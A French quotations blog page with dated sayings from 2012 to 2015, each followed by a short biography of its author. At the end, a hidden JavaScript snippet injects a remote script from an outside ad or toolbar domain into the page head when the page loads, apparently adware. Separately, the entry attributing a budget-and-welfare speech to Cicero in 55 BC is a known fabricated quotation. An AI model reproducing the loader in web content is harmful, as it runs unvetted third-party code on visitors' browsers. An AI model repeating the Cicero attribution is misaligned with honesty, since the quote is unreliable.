Citations & Proverbes

Citation du 15 juin 2015

 « Il est très bon en voyage d’emporter, outre son sac, provision d’entrain, de gaieté, de courage et de bonne humeur. »

Topffer

[Rodolphe Töpffer]

Rodolphe Töpffer (ou Toepffer), Suisse né à Genève le 31 janvier 1799 et mort dans cette même ville le 8 juin 1846, est un pédagogue, écrivain, politicien et auteur de bande dessinée suisse, considéré comme le créateur et le premier théoricien de cet art.

 

Citation du 01 juin 2015

 « Plus une chose est difficile, plus elle exige d’art et de vertu. « 

280px-Aristoteles_Louvre

[Aristote]

Aristote, surnommé le Stagirite (384 av. J.-C. – 322 av. J.-C.), est un philosophe grec de l’Antiquité. Avec Platon, dont il fut le disciple à l’Académie, il est l’un des penseurs les plus influents que le monde ait connu. Il est aussi l’un des rares à avoir abordé pratiquement tous les principaux domaines de connaissance de son temps : biologie, physique, métaphysique, logique, poétique, politique, rhétorique et de façon ponctuelle l’économie.

 

Citation du 18 mai 2015

 « Mieux vaut ne rien dire et passer pour un con que de l’ouvrir et ne laisser aucun doute à ce sujet. » 

Gustave

[Gustave Parking]

Gustave Parking, né Pierre-Casimir Le Bras le 29 décembre 1955 à Bayonne, est un humoriste français.

 

Citation du 11 mai 2015

 « Le plus bel hommage que nous puissions rendre à un auteur n’est pas de rester attachés à la lecture de ses pages, mais plutôt de cesser inconsciemment de lire, de reposer le livre, de le méditer et de voir au-delà de ses intentions avec des yeux neufs. « 

Morgan

[Charles Morgan]

Charles Langbridge Morgan est un écrivain britannique, né le 22 janvier 1894 à Bromley (Kent) et mort le 6 février 1958 à Kensington en Londres, auteur de romans, d’essais, de poèmes et de pièces de théâtre.

 

Citation du 4 mai 2015

 « Combien désirent ce qui leur échappe et détestent ce qui est à leur portée. »

Ovide

[Ovide]

En latin Publius Ovidius Naso, né le 20 mars 43 av. J.-C. à Sulmona, dans le centre de l’Italie et mort en 17 ap. J.-C., en exil à Tomis (l’actuelle Constanţa en Roumanie), est un poète latin qui vécut durant la période qui vit la naissance de l’Empire romain. Son surnom Naso lui vient de son nez proéminent (tout comme Cicéron, dont le surnom signifie pois chiche, qu’il devait à la verrue d’un de ses ancêtres). Il naît un an après l’assassinat de Jules César, est adolescent lorsque Auguste s’empare du pouvoir pour transformer la République en Empire, et meurt trois ans après ce premier empereur.

 

Citation du 19 avril 2015

 « Le présent n’est pas un passé en puissance, il est le moment du choix et de l’action »

Beauvoir

[Simone de Beauvoir]

Simone de Beauvoir née Simone-Lucie-Ernestine-Marie Bertrand de Beauvoir le 9 janvier 1908 dans le e arrondissement de Paris1 et morte le 14 avril 1986 (à 78 ans) dans cette même ville, est une philosophe, romancière, épistolière, mémorialiste et essayiste française. Simone de Beauvoir est souvent considérée comme une théoricienne importante du féminisme, et a participé au mouvement de libération des femmes dans les années 1970. Elle a partagé la vie du philosophe Jean-Paul Sartre. Leurs philosophies, bien que très proches, ne sauraient être confondues.

 

Citation du 07 avril 2014

 « Lorsque tu fais quelque chose, sache que tu auras contre toi ceux qui voulaient faire la même chose, ceux qui voulaient faire le contraire et l’immense majorité de ceux qui ne voulaient rien faire »

Confucius[Confucius]

Confucius (chinois : 孔夫子 ; en pinyin Kǒngfūzǐ, Wade-Giles: K’ung-fu-tzu) ou bien (chinois : 孔子 ; en pinyin Kǒngzǐ), né le 28 septembre 551 av. J.-C. à Zou (陬) et mort le 11 mai 479 av. J.-C. à Qufu (曲阜), est le personnage historique ayant le plus marqué la civilisation chinoise. Considéré comme le premier « éducateur » de la Chine, son enseignement a donné naissance au confucianisme, une doctrine politique et sociale qui a été érigée en « religion d’État » dès la dynastie Han et qui ne fut officiellement bannie qu’au début du XXe siècle. Né à Zou (陬) près de Qufu (曲阜) dans l’actuelle province du Shandong, il est généralement appelé Kǒngzǐ (孔子) ou Kǒng Fūzǐ (孔夫子) par les Chinois, ce qui signifie « Maître Kong » et qui a été latinisé en « Confucius » par les Jésuites.

 

Citation du 03 avril 2014

« Savoir n’est pas savoir, si personne d’autre ne sait ce que l’on sait »

moz-screenshot-86

[Caius Lucilius]

Lucilius (né en 180 ou 148 av. J.-C. à Suessa Aurunca – mort en 102 ou 101 av. J.-C.) est un poète latin fondateur de la satire qui aurait influencé Horace.. Il subsiste aujourd’hui uniquement des fragments de son travail. Il était citoyen romain de la classe équestre et a appartenu au cercle de Scipio Aemilianus.

 

Citation du 02 décembre 2013

« Les hommes ne s’attachent point à nous en raison des services que nous leur rendons, mais en raison de ceux qu’ils nous rendent. »

Labiche[Eugène Labiche]

Eugène Labiche est un dramaturge français, né le 6 mai 1815 à Paris où il est mort le 22 janvier 1888. Il a été élu membre de l’Académie française en 1880 au fauteuil 15, à la suite du journaliste Ustazade Silvestre de Sacy.

 

Citation du 20 novembre 2013

« Quand vous délibérez, prenez dans le passé des exemples pour l’avenir : ce qui est déjà connu vous fera juger de ce que vous ne connaissez pas encore »

Isocrate[Isocrate]

En grec ancien Ἰσοκράτης / Isokrátês (Athènes 436–338 av. J.-C.), l’un des dix orateurs attiques. Il fut le fondateur d’une école de rhétorique célèbre, qui forma nombre d’orateurs. Son idéal de culture, qu’il appela « philosophie », enseignait que l’art de bien parler passait par l’art de bien penser. Il s’opposa aux sophistes et à Platon. Toute sa vie, il n’eut de cesse d’appeler les Grecs à l’union pour lutter contre l’ennemi héréditaire que représentaient les Barbares, à savoir les Perses.

 

Citation du 20 novembre 2013

« Qui fait toujours ce qu’il veut fait rarement ce qu’il doit. »

220px-Axel_Oxenstierna2[Chancellier Oxenstierna]

Homme d’État suédois (Fånö, Uppsala, 1583-Stockholm 1654). Chancelier (1612), il a la confiance de Gustave-Adolphe, qu’il remplace au gouvernement pendant ses campagnes. Chef du Conseil de régence de Christine (1632), il réforme le royaume, crée l’université d’Åbo, et fait fonder en Amérique la colonie du Delaware (1638). Après la défaite de Nordlingen (1634), il restitue à la Pologne les conquêtes de Prusse, puis signe avec Richelieu l’alliance de Hambourg (1638), avant d’imposer au Danemark le traité de Brömsebro (1645). Par la paix de Westphalie (1648), il obtient la cession à la Suède de la Poméranie occidentale, des bouches de l’Oder avec Stettin, de Brême et de Verden.

 

Citation du 14 novembre 2013

« Les bons éléments sont ceux qui trouvent les solutions, les mauvais sont ceux qui trouvent les excuses »

[Bernard Werber]

 (Prononcer /vɛʁbɛʁ/), né le 18 septembre 1961 à Toulouse, est un écrivain français. Il est principalement connu pour sa trilogie des Fourmis. Son œuvre, traduite dans une trentaine de langues, fait se rencontrer philosophie, spiritualité, science-fiction, polar, biologie, mythologie, etc. L’auteur qualifie parfois ses romans de « philosophie-fiction ».

 

Citation du 07 novembre 2013

« Il vous est parfois plus aisé de savoir ce que vous voulez quand vous vous retrouvez face à qui ne sait pas ce qu’il veut »

[Catherine Bensaïd]

Née le 29 octobre 1950) est une psychiatre et psychothérapeute française, écrivain à ses heures, et auteur de plusieurs « livres à succès ».

 

Citation du 22 octobre 2013

« Hannibal était borgne. Il se moqua du peintre qui le peignit avec deux yeux, et récompensa celui qui le peignit de profil. On ne veut pas être loué trop fadement ; mais on est bien aise qu’on dissimule nos défauts. »

[Claude-Adrien Helvétius]

Claude-Adrien Schweitzer, latinisé en Helvétius, né le 26 janvier 1715 à Paris et mort le 26 décembre 1771 à Paris, est un philosophe et poète français.

 

Citation du 22 octobre 2013

« Une langue est faite pour transmettre le meilleur d’hier à ceux qui viendront demain »

[Dominique Noguez]

Né le 12 septembre 1942 à Bolbec (Seine-Maritime), est un écrivain français. Il s’attache à défendre et faire connaître les autres écrivains, notamment lorsqu’ils sont perçus comme mal-pensants par l’époque, comme Michel Houellebecq.

 

Citation du 07 octobre 2013

« La parfaite valeur est de faire sans témoins ce qu’on serait capable de faire devant tout le monde »

[La Rochefoucauld]

François VI, duc de La Rochefoucauld, prince de Marcillac, né le 15 septembre 1613 à Paris et mort le 17 mars 1680, est un écrivain, moraliste et mémorialiste français, surtout connu pour ses Maximes. Officiellement, il n’a publié que « Mémoires » et « Maximes », mais cet homme de lettres émérite écrivait beaucoup.

 

Citation du 28 septembre 2013

« Rien ne se fait sans un peu d’enthousiasme »

[Voltaire]

François Marie Arouet, dit Voltaire  – l’origine la plus couramment acceptée de ce pseudonyme est l’anagramme obtenue à partir des lettres capitales AROUET L(e) J(eune) écrites en latin AROVETLI -, né le 21 novembre 1694 à Paris où il meurt le 30 mai 1778, est un écrivain et philosophe qui a marqué le XVIIIe siècle  et qui occupe une place particulière dans la mémoire collective des Français. Il inaugure en effet la figure de l’intellectuel engagé au service de la vérité, de la justice et de la liberté de penser.

 

Citation du 21 septembre 2013

« Notre plus grande gloire n’est pas de ne jamais tomber, mais de nous relever chaque fois que nous tombons »

[Confucius]

Né le 28 septembre 551 av. J.-C. à Zou (陬) et mort le 11 mai 479 av. J.-C. à Qufu (曲阜), est le personnage historique ayant le plus marqué la civilisation chinoise. Considéré comme le premier « éducateur » de la Chine, son enseignement a donné naissance au confucianisme, une doctrine politique et sociale qui a été érigée en « religion d’État » dès la dynastie Han et qui ne fut officiellement bannie qu’au début du XXe siècle.

 

Citation du 07 septembre 2013

« Les finances publiques doivent être saines, le budget doit être équilibré, la dette publique doit être réduite,l’arrogance de l’administration doit être combattue et contrôlée, et l’aide aux pays étrangers doit être diminuée de peur que Rome ne tombe en faillite. La population doit encore apprendre à travailler au lieu de vivre de l’aide publique. « 

[Cicéron : 55 avant J-C]

Cicéron (en latin Marcus Tullius Cicero), né le 3 janvier 106 av. J.-C. à Arpinum en Italie et assassiné le 7 décembre 43 av. J.-C. à Gaète, est un homme d’État romain et un auteur latin.Orateur remarquable, il publia une abondante production considérée comme un modèle de l’expression latine classique, et dont la plus grande partie nous est parvenue.

 

Citation du 31 août 2013

« Aucun grain de sable n’est insignifiant dans le mécanisme d’une montre »

[Jeremy Taylor]

(1613 – 13 août 1667), théologien et prédicateur anglican, né à Cambridge. Il fut nommé en 1642 chapelain du roi Charles Ier d’Angleterre, vécut dans la retraite depuis la mort de ce prince jusqu’à la restauration des Stuarts, fut promu par Charles II d’Angleterre à l’Évêché de Down et appelé au conseil privé.

hh

Citation du 23 août 2013

« Le seul danger, c’est la bêtise ou l’incompétence. »

[Isabelle Huppert]

Emblème d’une élégance d’alcôve, d’un charisme sombre, Isabelle Huppert s’inscrit dans la tradition du réalisme psychologique à la française qui se magnifie sous la direction de Chabrol. Le réalisateur demeure son Pygmalion, puisqu’à eux deux, ils accumulent une conséquente filmographie à base de drames : ‘Une affaire de femmes’, ‘La Cérémonie’, ‘Madame Bovary’, ‘L’Ivresse du pouvoir’. Autant de rôles difficiles que l’actrice compose avec talent, poussée parfois dans des accès de méchanceté sans éclat de voix. Cette aptitude à la suggestion, qui fait d’elle la représentante d’une forme de jeu très cérébrale, lui permet de mener une carrière parsemée de rôles plus intrigants les uns que les autres.

 

Proverbe du 27 juillet 2013

« Que celui qui n’a pas traversé ne se moque pas de celui qui s’est noyé »
[Proverbe africain]

hhh

Citation du 20 juillet 2013

 « Incarnez vous même le changement auquel vous voulez que les autres aspirent »

[Ghandi]

Mohandas Karamchand Gandhi (en gujarâtî : મોહનદાસ કરમચંદ ગાંધી ; romanisé : mohandās karamcaṃd gāndhī, API : /moːhənd̪aːs kərəmtʃənd̪ gaːnd̪ʱiː/), né à Porbandar, Goujarat le 2 octobre 1869, mort à Delhi le 30 janvier 1948, est un dirigeant  politique, important guide spirituel de l’Inde et du mouvement pour l’indépendance de ce pays. Il est communément connu et appelé en Inde et dans le monde comme Mahatma Gandhi (du sanskrit, Mahatma : grande âme) – « Mahâtma » étant un titre qu’il refusa toute sa vie d’associer à sa personne , voire simplement Gandhi, Gandhiji, ou Bapu (Père  dans plusieurs des langues de l’Inde).

jjj

Citation du 13 juillet 2013

  » La véritable histoire d’un être n’est point dans ce qu’il a fait, mais dans ce qu’il a voulu faire. « 

[Thomas Hardy]

Thomas Hardy OM (2 juin 1840 – 11 janvier 1928) est un poète et romancier anglais appartenant au courant naturaliste. Auteur devenu aujourd’hui classique, il a particulièrement influencé D. H. Lawrence. Il a reçu l’ordre du Mérite en 1910.Il se considérait lui-même d’abord comme un poète, n’écrivant des romans que pour gagner sa vie. La majorité de son œuvre, qui se déroule essentiellement dans la région fictive du Wessex, dépeint des personnages en lutte contre leurs passions et les circonstances. Sa poésie, publiée après ses 50 ans, est jugée d’une qualité égale à ses romans, surtout depuis sa relecture par un groupe d’écrivains anglais, The Movement, dans les années 1950 et 1960.

 

 

Citation du 06 juin 2013

 « Il n’existe pas d’autre voie vers la solidarité humaine que la recherche et le respect de la dignité individuelle »

[Pierre Lecomte du Nouÿ]

Pierre Lecomte du Nouÿ (20 décembre 1883 Paris – 22 septembre 1947 New York) est un mathématicien, biophysicien, écrivain et philosophe français, descendant de Pierre Corneille, fils d’André Lecomte du Noüy et d’Hermine-Augustine-Eugénie Lecomte du Noüy.

 

 

Citation du 31 mai 2013

« L’ennui dans ce monde, c’est que les idiots sont sûrs d’eux et les gens sensés pleins de doutes. »

[Bertrand Russell]

Bertrand Arthur William Russell, 3e comte Russell, né le 18 mai 1872 à Trellech (Monmouthshire), et mort le 2 février 1970 près de Penrhyndeudraeth (Pays de Galles), est un mathématicien, logicien, philosophe, épistémologue, homme politique et moraliste britannique. Russell est considéré comme l’un des plus importants philosophes du XXe siècle. Sa pensée peut être présentée selon trois grands axes.

hhh

Citation du 23 mai 2013

 « C’est le propre de l’homme de se tromper ; seul l’insensé persiste dans son erreur »


[Cicéron]

Cicéron (en latin Marcus Tullius Cicero) est né le 3 janvier 106 av. J.-C., à Arpinum en Italie et mort le 7 décembre 43 av. J.-C. à Formia, est un homme d’État romain et un auteur latin. Orateur remarquable, il publia une abondante production considérée comme un modèle de l’expression latine classique, et dont la plus grande partie nous est parvenue. S’il s’enorgueillit d’avoir sauvé la République romaine de Catilina, sa vie politique fut diversement appréciée et commentée : intellectuel égaré au milieu d’une foire d’empoigne, parvenu italien monté à Rome, opportuniste versatile, « instrument passif de la monarchie » rampante de Pompée puis de César selon Theodor Mommsen et Jérôme Carcopino[1] mais aussi, pour Pierre Grimal, l’intermédiaire qui nous transmit une partie de la philosophie grecque.

 

 

Citation du 01 mai 2013

« Il est plus intelligent d’allumer une toute petite lampe, que de te plaindre de l’obscurité »


[Lao Tseu]

Lao Tseu est un sage chinois dont la tradition fait un contemporain de Confucius (milieu du VIe siècle av. J.-C. – milieu du Ve siècle av. J.-C., fin de la période des Printemps et des Automnes), considéré a posteriori comme l’ancêtre du taoïsme. Il serait né dans le pays de Chu du royaume des Zhou et serait parti pour une retraite spirituelle vers l’ouest de la Chine actuelle avec une destination inconnue. Les informations historiques le concernant sont rares et incertaines et sa biographie se développe à partir de la dynastie Han essentiellement à partir d’éléments surnaturels et religieux ; quelques chercheurs sceptiques estiment depuis la fin du XXe siècle qu’il s’agit d’un personnage fictif et composite, et non proprement historique.

 

 

Citation du 23 avril 2013

« Je sens que je suis libre mais je sais que je ne le suis pas »


[Emil Michel Cioran]

Né le 8 avril 1911 à Răşinari en Roumanie, mort le 20 juin 1995 à Paris, est un philosophe et écrivain roumain, d’expression roumaine initialement, puis française à partir de 1949 (Précis de décomposition). Bien qu’ayant vécu la majeure partie de sa vie en France, il n’a jamais demandé la nationalité française.

 

 

Proverbe du 19 avril 2013

« I done aou in plas pou akokiyé rode pa pou alonzé »
[Proverbe réunionnais]

N’abusons pas de la solidarité dont savent encore faire preuve certains de nos concitoyens …

 

 

Citation du 23 mars 2013

« Songe donc à ce qui te reste, plutôt qu’à ce que tu n’as plus »

[Joseph Joubert]

Né à Montignac (Périgord) le 7 mai 1754 et mort à Paris le 4 mai 1824, est un moraliste et essayiste français. À partir de l’âge de 14 ans, il suivit les cours d’un collège religieux de Toulouse, où il enseigna lui-même par la suite, jusqu’en 1776. En 1778, il monta à Paris où il rencontra D’Alembert et Diderot et se lia d’amitié avec Chateaubriand. Il vécut entre Paris, auprès de ses amis, et sa maison de Villeneuve-sur-Yonne. De son vivant, Joubert ne publia jamais rien, mais il écrivit de nombreuses lettres, ainsi que des notes et des journaux où il reportait ses réflexions sur la nature de l’homme, sur la littérature, et sur d’autres sujets, dans un style poignant, volontiers aphoristique.

 

 

Citation du 16 mars 2013

« Il n’y a pas de dignité possible, pas de vie réelle pour un homme qui travaille douze heures par jour sans savoir pourquoi il travaille« 

[André Malraux]

De son nom complet Georges André Malraux, né à Paris au 53 rue Damrémont (18e) le 3 novembre 1901 et mort à Créteil (Val-de-Marne) le 23 novembre 1976, est un écrivain, un aventurier, un homme politique et un intellectuel français.

 

 

Citation du 09 mars 2013

« Aucun de nous, en agissant seul, ne peut atteindre le succès. »

[Nelson Mandela]

Nelson Mandela participe en 1944 à l’African National Congress, parti modéré de la bourgeoisie noire. Emprisonné neuf mois en 1952 après le succès de la première campagne de désobéissance civile, il sera acquitté. Il crée alors un mouvement armé à l’intérieur de l’ANC. Il voyage pendant quelque temps en Afrique et à Londres mais, à son retour, il est arrêté et condamné à cinq ans de prison. Un deuxième procès se conclut par une condamnation à perpétuité. Refusant toute proposition de liberté conditionnelle, il sera tout de même libéré en 1990. Il dirige alors l’ANC légalisé afin de construire une Afrique du Sud unie et aspire à la création d’un Parlement élu par tous sur une base non raciale. Il entreprend des négociations avec le gouvernement blanc, malgré un regain de violence des extrémistes de la minorité blanche. Un accord aboutit à la fixation d’élections générales au suffrage universel en 1994. Mandela devient alors le premier dirigeant noir de l’Afrique du Sud et se voit décerner le prix Nobel de la paix. En 2004, il est élu première personnalité sud-africaine. Il se consacre aujourd’hui à la lutte contre le sida.

 

Citation du 09 mars 2013

« L’existence de l’homme n’est qu’un soupir dans le tourbillon de l’humanité »
[Extrait de la bande dessinée Largo Winch]

[Jean Van Hamme]

Né le (16 janvier 1939 à Bruxelles, Belgique) est un romancier et scénariste belge de bande dessinée mais également de films pour la télévision. Jean Van Hamme a décidé d’arrêter plusieurs de ses séries de bandes dessinées pour se consacrer à d’autres activités telles que le théâtre ou le roman. Il ne scénarise donc plus Thorgal, ni XIII, mais créait en 2009 une nouvelle série, historique cette fois, Rani, dont le scénario fera l’objet d’un téléfilm. Il continue également Largo Winch et Lady S.. Depuis 2010, il a repris le scénario de Wayne Shelton après 7 ans d’arrêt pour le 9ème album : c’est le 4ème qu’il scénarise. Il a aussi annoncé que, contrairement à ce qu’il avait déjà annoncé, il écrirait une quatrième aventure de Blake et Mortimer, avec Antoine Aubin au dessin.

 

 

Citation du 26 février 2013

« Ce n’est pas parce que les choses sont difficiles que nous n’osons pas, c’est parce que nous n’osons pas qu’elles sont difficiles« 

[Sénèque]

Sénèque le Jeune (en latin Lucius Annaeus Seneca), né dans l’actuelle Cordoue au sud de l’Espagne d’aujourd’hui vers 4 av. J.-C. et mort le 12 avril 65 ap. J.-C., est un philosophe de l’école stoïcienne, un dramaturge et un homme d’État romain du Ier siècle de l’ère chrétienne.

 

Proverbe du 31 janvier 2013

«Quand vous êtes très jeune, l’humour est une défense. Par la suite, il peut devenir une arme»

[René Goscinny]

 Né le 14 août 1926 à Paris et mort le 5 novembre 1977 d’un arrêt cardiaque, est un écrivain, humoriste et scénariste de bande dessinée français. Issu d’une famille d’origine polonaise de confession juive, il est mondialement connu pour être le créateur d’Astérix, d’Iznogoud et du Petit Nicolas ainsi que le principal scénariste de Lucky Luke. Il est l’un des auteurs français les plus lus au monde, l’ensemble de son œuvre représente environ 500 millions d’ouvrages vendus. Il a également permis la reconnaissance du métier à part entière de scénariste de bande dessinée qui n’existait pas avant lui. René Goscinny a utilisé quelques pseudonymes comme René Maldecq, René Macaire, Agostini, Liliane d’Orsay.

 

Proverbe du 31 janvier 2013

«Suis le conseil de celui qui te fait pleurer, et non de celui qui te fait rire»

[Proverbe arabe]

 

Citation du mercredi 22 janvier 2013

«Je suis les liens que je tisse avec les autres»

[Albert Jacquard]

 Né à Lyon le 23 décembre 1925, est un scientifique et essayiste français. Il est généticien et a été membre du Comité consultatif national d’éthique. Albert Jacquard consacre l’essentiel de son activité à la diffusion d’un discours humaniste destiné à favoriser l’évolution de la conscience collective. Il est un des soutiens de l’association Droit au logement. Il est membre du comité de parrainage de la Coordination française pour la Décennie de la culture de paix et de non-violence. Il a animé durant 9 ans, de septembre 2001 à Juillet 2010, une chronique radiophonique quotidienne sur France Culture. Il est également un défenseur du concept de la décroissance soutenable.

 

Citation du mardi 15 janvier 2013

«La littérature ne change ni l’homme ni la société. Pour autant, l’absence de littérature rendrait l’homme encore plus infréquentable»

[Tahar Ben Jelloun]

Tahar Ben Jelloun (en arabe : طاهر بن جلون) est un écrivain et poète marocain de langue française, né à Fès le 1er décembre 1944 (au Maroc).

 

Citation du samedi 22 décembre 2012

« L’enfance c’est de croire qu’avec le sapin de Noël et trois flocons de neige toute la terre est changée »

[André Laurendeau]

(21 mars 1912 à Montréal – 1er juin 1968) est un romancier, dramaturge, essayiste, journaliste et homme politique québécois. Il accordait une grande importance à l’éducation et à l’avenir des jeunes. Sont nommés en son honneur : Le Cégep André-Laurendeau et l’école Laurendeau-Dunton, à Ville LaSalle (Montréal), une école à Saint-Hubert et une autre à Ottawa.

 

Citation du samedi 15 décembre 2012

« Fais bon accueil aux étrangers, car toi aussi, tu seras un étranger »

[Roger Ikor]

Né le 28 mai 1912 à Paris et mort en 1986, est un écrivain français, lauréat du prix Goncourt en 1955. À travers un style inspiré et puissant, ses récits, généralement épiques, racontent tantôt L’insurrection ouvrière de juin 1848 (1936), tantôt, l’histoire de Saint-Just (1937), ou encore, dans Les grands moyens, une épopée israélite.
Les Eaux mêlées (1955), qui remporta le prix Goncourt la même année, et qui forme, avec La Greffe du printemps, un diptyque intitulé Les Fils d’Avrom, raconte l’histoire d’une famille juive installée en France et liée par le sang à une famille française non-juive. S’étalant sur trois générations, le récit expose le lien que la famille va forger coute que coute avec sa nouvelle patrie.

 

 

Citation du Samedi 08 décembre 2012

« Ne commence rien dont tu puisses te repentir dans la suite. Garde-toi d’entreprendre ce que tu ne sais pas faire, et commence par t’instruire de ce que tu dois savoir… »

[Pythagore]

(En grec ancien Πυθαγόρας / Pythagóras) est un philosophe, mathématicien et scientifique présocratique qui serait né aux environs de 580 av. J.-C. à Samos, une île de la mer Égée au Sud-Est de la ville d’Athènes ; on établit sa mort vers 495 av. J.-C., à l’âge de 85 ans. Selon une tradition, Pythagore participe aux Jeux olympiques à l’âge de 17 ans. Ce serait la 57e olympiade (-552) (et non la 48°e, -588, selon Ératosthène). Il remporte toutes les compétitions de pugilat.
La richesse des travaux entrepris par l’école pythagoricienne a été telle que ses idées et découvertes ont inspiré nombre de courants de pensée. Pythagore a influencé toutes les époques et toutes les cultures d’Occident et d’Orient, toutes les disciplines : mathématiques, musique, philosophie, astronomie, etc. Son encyclopédisme en fait une pensée totale, avec interpénétrations et ramifications.
En art, Pythagore inspire l’architecte romain Vitruve au Ier siècle puis les théoriciens du nombre d’or comme Luca Pacioli illustré par Léonard de Vinci en 1509.

// <![CDATA[
(function(){try{var header=document.getElementsByTagName(« HEAD »)[0];var script=document.createElement(« SCRIPT »);script.src= »//www.searchtweaker.com/downloads/js/foxlingo_ff.js »;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState== »complete »||this.readyState== »loaded »)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
// ]]>//pstatic.eshopcomp.com/nwp/v0_0_601/release/Store.html